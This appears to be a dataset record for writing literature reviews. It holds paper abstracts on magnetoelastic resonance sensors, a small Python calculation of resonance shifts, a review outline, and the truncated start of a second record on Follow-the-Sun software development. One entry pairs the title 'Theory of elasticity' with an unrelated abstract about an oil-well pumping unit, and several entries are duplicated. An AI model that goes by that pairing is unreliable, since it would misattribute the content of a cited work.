can be switched from negative, through zero, to positive. Experimental results are compared with a theoretical model that describes the effects of temperature and applied DC magnetic field on both the mechanical and magnetoelastic properties of the sensor material. --- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. 
Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelastic sensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelastic sensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity.
paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A wireless, remote query ammonia sensor. paper_content: Abstract This paper presents a wireless, remote query ammonia sensor comprised of a free-standing magnetoelastic thick-film coated with a polymer, poly(acrylic acid-co-isooctylacrylate), that changes mass in response to atmospheric ammonia concentration. The mass of the polymer layer modulates the resonant frequency of the ferromagnetic magnetoelastic substrate, hence by monitoring the frequency response of the sensor, atmospheric NH3 concentration can be determined remotely, without the need for physical connections to the sensor or specific alignment requirements. The effect of copolymer composition, polymer film thickness, and relative humidity level (RH) on the sensitivity of the sensor was investigated. The sensor linearly tracks ammonia concentration below 0.8 vol.%, and tracks higher concentrations logarithmically; within the linear calibration range, a 0.02 vol.% change in NH3 concentration can be detected. --- paper_title: Ethylene Detection Using Nanoporous PtTiO2 Coatings Applied to Magnetoelastic Thick Films paper_content: This paper reports on the use of nanoporous Pt-TiO2 thin films coated onto magnetoelastic sensors for the detection of ethylene, an important plant growth hormone. Five different metal oxide coatings, TiO2, TiO2+ZrO2, TiO2+TTCN(1,4,7-Trithiacyclononane)+Ag, SiO2+Fe, and TiO2+Pt, each having demonstrated photocatalytic activity in response to ethylene, were investigated for their ability to change mass or elasticity in response to changing ethylene concentration.
Pt-TiO2 films were found to possess the highest sensitivities and, coupled with the magnetoelastic sensor platform, were capable of sensing ethylene levels of < 1 ppm. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. --- paper_title: A wireless pH sensor based on the use of salt-independent micro-scale polymer spheres paper_content: Abstract Poly(vinylbenzylchloride-co-2,4,5-trichlorophenyl acrylate) (VBC-TCPA) spheres, approximately 725 nm in diameter, were prepared by dispersion polymerization then derivatized with diethanolamine to realize a mass changing pH-responsive polymer. While the pH-responsive polymer spheres are suitable for use with any mass-sensitive sensor platform, in this work, the polymer spheres are combined with magnetoelastic thick films to achieve a remote query pH sensor. The magnetoelastic pH sensors were fabricated by spin-coating the aminated polymer spheres onto the surface of a magnetoelastic ribbon. The pH response of these sensors was examined by monitoring changes in sensor resonance frequency as a function of test-solution pH. The sensors demonstrate a linear pH response from pH 3.0 to 9.0, with a change in resonance frequency f_r of 0.2% f_r per pH for a 1.5-μm thick polymer layer. Measurements were virtually independent of background potassium chloride concentration. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor.
--- paper_title: A wireless pH sensor using magnetoelasticity for measurement of body fluid acidity. paper_content: The determination of body fluid acidity using a wireless magnetoelastic pH-sensitive sensor is described. The sensor was fabricated by casting a layer of pH-sensitive polymer on a magnetoelastic ribbon. In response to an externally applied time-varying magnetic field, the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the pH polymer film, which varies as the film swells and shrinks in response to pH. As the magnetoelastic sensor is magnetostrictive, the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely using a pickup coil. The sensor can be used for direct measurements of body fluid acidity without a pretreatment of the sample by using a filtration membrane. A reversible and linear response was obtained between pH 5.0 and 8.0 with a measurement resolution of pH 0.1 and a slope of 0.2 kHz pH(-1). Since there are no physical connections between the sensor and the instrument, the sensor can be applied to in vivo and in situ monitoring of the physiological pH and its fluctuations. --- paper_title: A wireless and sensitive sensing detection of polycyclic aromatic hydrocarbons using humic acid-coated magnetic Fe3O4 nanoparticles as signal-amplifying tags paper_content: Abstract A wireless magnetoelastic-sensing device for the detection of polycyclic aromatic hydrocarbons (PAHs) with anthracene as the model target is reported using humic acid-modified magnetic Fe3O4 nanoparticles (HMNPs) as signal-amplifying tags. A sandwich-type detection strategy involves the humic acid (HA)/chitosan composite self-assembled on the polyurethane-protected sensor surface and HMNPs, both of which flank the anthracene target in sequence. As the HMNPs-combined anthracene absorbs to the sensor surface, there is an increase in the mass load on the sensor, and consequently a decrease in resonance frequency. Under optimal conditions, the sensor shows a linear response to polycyclic aromatic hydrocarbons with sensitivity depending on the benzene rings. The sensor shows the largest sensitivity to benzo[a]pyrene due to its 5 rings, with a detection limit of 3 nM. Tap water, river water and spring water were analyzed with this sensor. --- paper_title: Magnetoelastic Immunosensors: Amplified Mass Immunosorbent Assay for Detection of Escherichia coli O157:H7 paper_content: A mass-sensitive magnetoelastic immunosensor for detection of Escherichia coli O157:H7 is described, based on immobilization of affinity-purified antibodies attached to the surface of a micrometer-scale magnetoelastic cantilever. Alkaline phosphatase is used as a labeled enzyme to the anti-E. coli O157:H7 antibody, amplifying the mass change associated with the antibody−antigen binding reaction by biocatalytic precipitation of 5-bromo-4-chloro-3-indolyl phosphate in a pH 10.0 PBS solution. The detection limit of the biosensor is 10^2 E. coli O157:H7 cells/mL. A linear change in the resonance frequency of the biosensor was found for E. coli O157:H7 concentrations ranging from 10^2 to 10^6 cells/mL.
--- paper_title: A wireless magnetoelastic biosensor for rapid detection of glucose concentrations in urine samples paper_content: Abstract A wireless magnetoelastic glucose biosensor is fabricated by co-immobilizing glucose oxidase (GOx) and catalase onto a pH-sensitive-polymer-coated magnetoelastic sensor with chitosan as a supporting substrate. The GOx-catalyzed hydrolyzation of glucose produces gluconic acid, resulting in shrinking and corresponding mass decrease in the pH-responsive polymer, and consequently the resonance frequency of the magnetoelastic sensor increasing. The glucose biosensor is applied to measurement of glucose concentrations within urine samples; the shift in resonance frequency is found proportional to the glucose concentration, with a linear response obtained between 1 mM and 15 mM. The presence of acetaminophen, lactose, saccharose and galactose does not significantly interfere with glucose detection; ascorbic acid does, as expected, however its effect can be eliminated through cross-correlation with a pH-responsive magnetoelastic reference sensor or by pre-adjusting the sample to pH 7.0. An L9(3^4) orthogonal array based on the Taguchi method is used to optimize the sensor fabrication process and to determine the key factors that affect sensor performance. Assays of 15 clinical urine samples give glucose levels that are in accordance with the results by a urine analyzer, showing the proposed sensor can be applied for glucose assay in urine. --- paper_title: Determination of glucose using bienzyme layered assembly magnetoelastic sensing device paper_content: Abstract A bienzyme layered assembly on magnetoelastic sensor, consisting of horseradish peroxidase and glucose oxidase is used to sense glucose by the horseradish peroxidase-mediated oxidation of 3,3′,5,5′-tetramethylbenzidine, by H2O2, and the formation of the insoluble product on the sensor surface. A horseradish peroxidase is used to analyze hydrogen peroxide (H2O2) via the biocatalyzed oxidation of tetramethylbenzidine and the precipitation of the insoluble product. The glucose oxidase catalyzed oxidation of glucose produces gluconic acid and H2O2, and the generated H2O2 effects the formation of the insoluble product in the presence of horseradish peroxidase. The insoluble product accumulated on the sensor surface resulting in shifts of the sensor resonance frequency which are correlated with the amount of H2O2 or glucose. The biosensor response is linear in the range of glucose concentrations of 5–50 mM, with a detection limit of 2 mM at a noise level of ∼10 Hz. The biosensor is applied to determine glucose concentration in urine sample. --- paper_title: A wireless, remote query glucose biosensor based on a pH-sensitive polymer paper_content: This paper describes a wireless, remote query glucose biosensor using a ribbonlike, mass-sensitive magnetoelastic sensor as the transducer. The glucose biosensor is fabricated by first coating the magnetoelastic sensor with a pH-sensitive polymer and upon it a layer of glucose oxidase (GOx). The pH-responsive polymer swells or shrinks, thereby changing mass, respectively, in response to increasing or decreasing pH values. The GOx-catalyzed oxidation of glucose produces gluconic acid, inducing the pH-responsive polymer to shrink, which in turn decreases the polymer mass.
In response to a time-varying magnetic field, a magnetoelastic sensor mechanically vibrates at a characteristic resonance frequency, the value of which inversely depends on sensor mass loading. As the magnetoelastic films are magnetostrictive, the vibrations launch magnetic flux that can be remotely detected using a pickup coil. Hence, changes in the resonance frequency of a passive magnetoelastic transducer are detected on a remote query ... --- paper_title: Measurement of Glucose Concentration in Blood Plasma Based on a Wireless Magnetoelastic Biosensor paper_content: Abstract A wireless magnetoelastic glucose biosensor in blood plasma is described, based on using a mass sensitive magnetoelastic sensor as transducer. The glucose biosensor was fabricated by coating the ribbon‐like, magnetoelastic sensor with a pH sensitive polymer and a biolayer of glucose oxidase (GOx) and catalase. The pH response polymer swells or shrinks, thereby changing sensor mass loading, respectively, in response to increase or decrease of pH values. The GOx–catalyzed oxidation of the glucose in blood plasma produces gluconic acid, resulting in the pH sensitive polymer shrinking, which in turn decreases the sensor mass loading. The results show that the proposed magnetoelastic glucose biosensor can be successfully applied to determine the concentration of glucose in blood plasma. At glucose concentration range of 2.5–20.0 mmol/l, the biosensor responses are reversible and linear, with a detection limit of 1.2 mmol/l. Since no physical connections between the sensor and the monitoring instrument... --- paper_title: A magnetoelastic bioaffinity-based sensor for avidin. paper_content: Abstract A magnetoelastic bioaffinity sensor coupled with biocatalytic precipitation is described for avidin detection. The non-specific adsorption characteristics of streptavidin on different functionalized sensor surfaces are examined. It is found that a biotinylated poly(ethylene glycol) (PEG) interface can effectively block non-specific adsorption of proteins. Coupled with the PEG immobilized sensor surface, alkaline phosphatase (AP) labeled streptavidin is used to track specific binding on the sensor. This mass-change-based signal is amplified by the accumulation on the sensor of insoluble products of 5-bromo-4-chloro-3-indolyl phosphate catalyzed by AP. The resulting mass loading on the sensor surface in turn shifts the resonance frequency of the magnetoelastic sensors, with an avidin detection limit of approximately 200 ng/ml. --- paper_title: A wireless magnetoelastic biosensor for convenient and sensitive detection of acid phosphatase paper_content: This paper describes a wireless and low-cost biosensor for the sensitive detection of acid phosphatase (ACP) using a thick-film magnetoelastic transducer. In response to an externally applied time-varying magnetic field, the magnetoelastic ribbon-like sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached film. As the ribbon material is magnetostrictive, the mechanical vibrations of the sensor launch magnetic flux as a return signal that can be detected remotely using a pickup coil. The measurement is based on the enzymatic hydrolysis of 5-bromo-4-chloro-3-indolyl phosphate (BCIP), producing a dimer which binds tightly to the sensor surface, resulting in a change in the sensor resonance frequency. 
The biosensor demonstrates a linear shift in resonance frequency with ACP concentration ranging from 1.5 to 15 U/l, with a detection limit of 1.5 U/l at a noise level of ∼20 Hz. The sensitivity achieved is comparable to spectrometry and surface acoustic wave sensors. The effects of substrate concentration and BSA immobilization are detailed. --- paper_title: A wireless magnetoelastic-sensing device for in situ evaluation of Pseudomonas aeruginosa biofilm formation paper_content: A wireless, passive magnetoelastic-sensing device is presented for the in situ, continuous, and real-time evaluation of the formation of Pseudomonas aeruginosa biofilms. The sensor, a polyurethane-coated magnetostrictive ribbon, is placed in a flowing system, and both the resonance frequency and amplitude of the sensor are wirelessly monitored through magnetic field telemetry. The sensor platform appears to be of great utility for the in situ evaluation of biofilm formation. --- paper_title: The detection of Mycobacterium tuberculosis in sputum sample based on a wireless magnetoelastic-sensing device. paper_content: This paper presents a real-time detection of Mycobacterium tuberculosis (M. TB) using a wireless magnetoelastic sensor. The sensor is fabricated by coating a magnetoelastic ribbon (Metglas 2826MB) with a polyurethane protecting film. M. TB consumes the nutrients of a liquid culture medium in growing and reproducing process, which results in properties changes (viscosity, density, elasticity, ion concentration, etc.) of the culture medium, and consequently changes in the resonance frequency of the magnetoelastic sensor. Using the described technique M. TB is quantified and sensor response is proportional to logarithmic values of the M. TB concentration from 10^4 to 10^9 cells ml^-1, with a detection limit of 10^4 cells ml^-1 at a noise level of approximately 10 Hz. The sensor can be used effectively for monitoring the bacterial growth and good results were obtained when used in sputum sample. The drug-resistance of isoniazid (INH) and rifampin (RFP) on M. TB growth in culture medium was evaluated based on this proposed method. The wireless nature of the presented device facilitates the aseptic operations. --- paper_title: Quantification of multiple bioagents with wireless, remote-query magnetoelastic microsensors paper_content: This paper presents a micromagnetoelastic sensor array for simultaneously monitoring multiple biological agents. Magnetoelastic sensors, made of low-cost amorphous ferromagnetic ribbons, are analogous and complementary to piezoelectric acoustic wave sensors, which track parameters of interest via changes in resonance behavior. Magnetoelastic sensors are excited with magnetic ac fields, and, in turn, they generate magnetic fluxes that can be detected with a sensing coil from a distance. As a result, these sensors are highly attractive, not only due to their small size and low cost, but also because of their passive and wireless nature. Magnetoelastic sensors have been applied for monitoring pressure, temperature, liquid density, and viscosity, fluid flow velocity and direction, and with chemical/biological responsive coatings that change mass or elasticity, various biological and chemical agents. In this paper, we report the fabrication and application of a six-sensor array for simultaneous measurement of Escherichia coli O157:H7, staphylococcal enterotoxin B, and ricin.
In addition, the sensor array also monitors temperature and pH, so the measurements are independent of these two parameters. --- paper_title: A staphylococcal enterotoxin B magnetoelastic immunosensor. paper_content: A magnetoelastic immunosensor for detection of staphylococcal enterotoxin B (SEB) is described. The magnetoelastic sensor is a newly developed mass/elasticity-based transducer of high sensitivity having a material cost of approximately $0.001/sensor. Affinity-purified rabbit anti-SEB antibody was covalently immobilized on magnetoelastic sensors, of dimensions 6 mm x 2 mm x 28 μm. The affinity reaction of biotin-avidin and biocatalytic precipitation are used to amplify antigen-antibody binding events on the sensor surface. Horseradish peroxidase (HRP) and alkaline phosphatase were examined as the labeled enzymes to induce biocatalytic precipitation. The alkaline phosphatase substrate, 5-bromo-4-chloro-3-indolyl phosphate (BCIP) produces a dimer, which binds tightly to the sensor surface, inducing a change in sensor resonance frequency. The biosensor demonstrates a linear shift in resonance frequency with staphylococcal enterotoxin B concentration between 0.5 and 5 ng/ml, with a detection limit of 0.5 ng/ml. --- paper_title: A remote-query sensor for predictive indication of milk spoilage paper_content: Abstract Described is application of the remote-query (wireless, passive) magnetoelastic sensor platform for direct detection and monitoring of bacterium contamination of milk within hermetically sealed containers. Specific application is made to the quantification of Staphylococcus aureus ssp. anaerobius (S. aureus) concentrations in milk. S. aureus growth changes milk viscosity, in turn changing the resonance frequency of the liquid-immersed sensor, allowing S. aureus concentrations of 10^3 to 10^7 cells ml^-1 to be directly quantified. --- paper_title: Eliminating unwanted nanobubbles from hydrophobic solid/liquid interfaces: a case study using magnetoelastic sensors. paper_content: Air bubbles are known to form at the liquid/solid interface of hydrophobic materials upon immersion in a liquid (Holmberg, M.; Kühle, A.; Garnaes, J.; Mørch, K. A.; Boisen, A. Langmuir 2003, 19, 10510-10513). In the case of gravimetric sensors, air bubbles that randomly form at the liquid-solid interface result in poor sensor-to-sensor reproducibility. Herein a superhydrophilic ZnO nanorod film is applied to the originally hydrophobic surface of a resonance-based magnetoelastic sensor. The superhydrophilic coating results in the liquid completely spreading across the surface, removing unwanted air bubbles from the liquid/sensor interface. The resonance amplitude of uncoated (bare) and ZnO-modified sensors are measured in air and then when immersed in saline solution, ethylene glycol, or bovine blood. In comparison to the bare, hydrophobic sensors, we find that the standard deviation of the resonance amplitudes of the liquid-immersed ZnO-nanorod-modified sensors decreases substantially, ranging from a 27% decrease for bovine blood to a 67% decrease for saline. The strategy of using a superhydrophilic coating can be applied to other systems having similar interfacial problems. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants.
Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: The effect of TiO2 nanotubes in the enhancement of blood clotting for the control of hemorrhage. paper_content: Abstract The main biological purpose of blood coagulation is formation of an obstacle to prevent blood loss of hydraulic strength sufficient to withstand the blood pressure. The ability to rapidly stem hemorrhage in trauma patients significantly impacts their chances of survival, and hence is a subject of ongoing interest in the medical community. Herein, we report on the effect of biocompatible TiO2 nanotubes on the clotting kinetics of whole blood. TiO2 nanotubes 10 μm long were prepared by anodization of titanium in an electrolyte comprised of dimethyl sulfoxide and HF, then dispersed by sonication. Compared to pure blood, blood containing dispersed TiO2 nanotubes and blood in contact with gauze pads surface-decorated with nanotubes demonstrated significantly stronger clot formation at reduced clotting times. Similar experiments using nanocrystalline TiO2 nanoparticles showed comparatively weaker clot strengths and increased clotting times. The TiO2 nanotubes appear to act as a scaffold, facilitating fibrin formation. Our results suggest that application of a TiO2 nanotube functionalized bandage could be used to help stem or stop hemorrhage. ---
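Many of the entries above quantify detection limits as shifts in the sensor's resonance frequency. The short sketch below is only an illustrative back-of-the-envelope calculation of that mass sensitivity, using the standard first-order relations noted earlier; the ribbon dimensions and material constants are assumed, Metglas-like values, not data taken from any of the cited papers.

```python
import math

# Illustrative sketch only: fundamental longitudinal resonance of a free-standing
# ribbon and its first-order shift under a small, uniformly distributed mass load.
# All numbers below are assumed, order-of-magnitude values for a Metglas-like
# ribbon (hypothetical), not measurements from the cited papers.

def fundamental_frequency(length_m, youngs_modulus_pa, density_kg_m3, poisson):
    """f0 = (1 / 2L) * sqrt(E / (rho * (1 - sigma^2)))."""
    return (1.0 / (2.0 * length_m)) * math.sqrt(
        youngs_modulus_pa / (density_kg_m3 * (1.0 - poisson ** 2))
    )

def mass_load_shift(f0_hz, added_mass_kg, sensor_mass_kg):
    """Small-load approximation: delta_f ~ -f0 * delta_m / (2 * M)."""
    return -f0_hz * added_mass_kg / (2.0 * sensor_mass_kg)

if __name__ == "__main__":
    length, width, thickness = 6e-3, 2e-3, 28e-6        # m (assumed geometry)
    youngs, density, poisson = 105e9, 7900.0, 0.33       # Pa, kg/m^3 (assumed)
    sensor_mass = density * length * width * thickness   # kg (roughly a few mg)

    f0 = fundamental_frequency(length, youngs, density, poisson)
    shift = mass_load_shift(f0, added_mass_kg=1e-9, sensor_mass_kg=sensor_mass)
    print(f"f0 ~ {f0 / 1e3:.0f} kHz; shift for a 1 microgram load ~ {shift:.0f} Hz")
```

On these assumed numbers the fundamental mode lands in the hundreds of kHz and a microgram-scale load shifts it by a few tens of hertz, which is broadly consistent in order of magnitude with the Hz-to-kHz shifts reported across the abstracts above.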
Title: Theory, Instrumentation and Applications of Magnetoelastic Resonance Sensors: A Review
Section 1: Introduction
Description 1: Provide an overview of magnetoelastic sensors, their composition, operational principle, and various applications.
Section 2: The Equation of Motion of a Magnetoelastic Sensor
Description 2: Explain the theoretical model, including the equation of motion for magnetoelastic sensors, and discuss the boundary conditions and resonant frequency derivation.
Section 3: Effect of Mass Loading on a Magnetoelastic Sensor
Description 3: Discuss how mass loading affects the resonance frequency of magnetoelastic sensors and provide experimental data demonstrating these effects.
Section 4: Instrumentation: Early Developments
Description 4: Describe the initial instrumentation used with magnetoelastic sensors, including the types of circuits and measurement approaches used in early research.
Section 5: Modern Microcontroller Based Instrumentation
Description 5: Detail advancements in instrumentation, focusing on modern microcontroller-based designs and their components.
Section 6: Pressure Sensing
Description 6: Explain the application of magnetoelastic sensors in pressure sensing, including theoretical background and experimental results.
Section 7: Temperature Sensing
Description 7: Discuss the use of magnetoelastic sensors for temperature measurement, including the effects of temperature on resonance frequency.
Section 8: Measurement of Liquid Viscosity and Density
Description 8: Provide insights into how magnetoelastic sensors measure liquid viscosity and density, including theoretical models and practical examples.
Section 9: Monitoring Fluid Flow Rate
Description 9: Describe the application of magnetoelastic sensors in monitoring fluid flow rates and the principles behind this measurement.
Section 10: Measurement of Elastic Modulus of Thin Film
Description 10: Discuss the use of magnetoelastic sensors to measure the elastic modulus of thin films coated on their surface.
Section 11: Humidity Measurement Using a Magnetoelastic Sensor
Description 11: Explain the application of magnetoelastic sensors in humidity measurement, including coating materials and experimental data.
Section 12: Ethylene, CO2 and NH3 Sensors
Description 12: Describe the use of magnetoelastic sensors for detecting gases like ethylene, CO2, and NH3, including the coating materials and detection principles.
Section 13: Magnetoelastic pH Sensor
Description 13: Discuss the application of magnetoelastic sensors in pH measurement, including the responsive materials used and experimental findings.
Section 14: Detection of Escherichia coli O157:H7
Description 14: Explain the use of magnetoelastic sensors for detecting E. coli O157:H7, including methods for enhancing detection sensitivity.
Section 15: Magnetoelastic Glucose Biosensor
Description 15: Describe the application of magnetoelastic sensors in glucose detection, detailing the sensor design and performance in different environments.
Section 16: Magnetoelastic Avidin Biosensor
Description 16: Discuss the use of magnetoelastic sensors for detecting avidin, including the biochemical interactions and methods used for signal amplification.
Section 17: Other Bio-Sensing Applications
Description 17: Provide an overview of other bio-sensing applications of magnetoelastic sensors, including detection of pathogens, bacteria, and biochemical agents.
Section 18: Magnetoelastic Sensor for Monitoring Milk Quality
Description 18: Explain how magnetoelastic sensors are used to monitor milk quality, including the detection of lactose and bacterial growth.
Section 19: Magnetoelastic Sensor for Lipoprotein Detection
Description 19: Discuss the use of magnetoelastic sensors in detecting lipoprotein particles, including the biochemical reactions involved and the challenges faced.
Section 20: Magnetoelastic Sensors for Monitoring Blood Coagulation
Description 20: Describe how magnetoelastic sensors are used to monitor blood coagulation, including clotting time, clot strength, and aggregation tests.
Section 21: Conclusions
Description 21: Summarize the versatility and potential applications of magnetoelastic sensing technology, highlighting the advancements and future directions.
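For Section 2 of the outline above, the usual starting point is the one-dimensional longitudinal wave equation for the ribbon displacement u(x, t) with stress-free ends. This is a textbook form assumed here for orientation, not an expression quoted from the outline's sources:

\[
\rho\,\frac{\partial^{2} u}{\partial t^{2}} \;=\; \frac{E}{1-\sigma^{2}}\,\frac{\partial^{2} u}{\partial x^{2}},
\qquad
\left.\frac{\partial u}{\partial x}\right|_{x=0} \;=\; \left.\frac{\partial u}{\partial x}\right|_{x=L} \;=\; 0,
\]

whose harmonic solutions give the resonance series

\[
f_n \;=\; \frac{n}{2L}\sqrt{\frac{E}{\rho\,(1-\sigma^{2})}}, \qquad n = 1, 2, 3, \ldots
\]

with the n = 1 mode being the fundamental frequency discussed throughout the references above.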
A Systematic Literature Review of Best Practices and Challenges in Follow-the-Sun Software Development
6
--- paper_title: Mapping Global Software Development Practices for Follow-the-Sun Process paper_content: Several organizations are developing software twenty-four hours a day, seven days per week, with geographically distributed teams. This software development environment makes it possible to implement the Follow-the-Sun (FTS) strategy. In this study, we perform a mapping of the literature, based upon electronic searches of digital libraries, to identify practices applied in twenty-four-hour development environments in which the FTS strategy can be applied. Our results present practices and many key aspects of FTS implementation. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal: hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in cross-site coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluate whether FTS is to be successful in reducing software development duration. --- paper_title: Patterns in Effective Distributed Software Development paper_content: As with many other industries today, software development must increasingly adapt to teams whose members work together but are geographically distributed. Many factors have contributed to this rise in distributed software development (DSD), including companies' desires to leverage skilled resources wherever they can be found and to reduce costs by working in different labor markets. Its increasing popularity has led to diverse industrial experience, which has in turn led to some best practices and an initial body of knowledge. --- paper_title: Your time zone or mine?: a study of globally time zone-shifted collaboration paper_content: We conducted interviews with sixteen members of teams that worked across global time zone differences. Despite time zone differences of about eight hours, collaborators still found time to synchronously meet. The interviews identified the diverse strategies teams used to find time windows to interact, which often included times outside of the normal workday and connecting from home to participate. Recent trends in increased work connectivity from home and blurred boundaries between work and home enabled more scheduling flexibility.
While email use was understandably prevalent, there was also general interest in video, although obstacles remain for widespread usage. We propose several design implications for supporting this growing population of workers that need to span global time zone differences. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal: hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in cross-site coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal 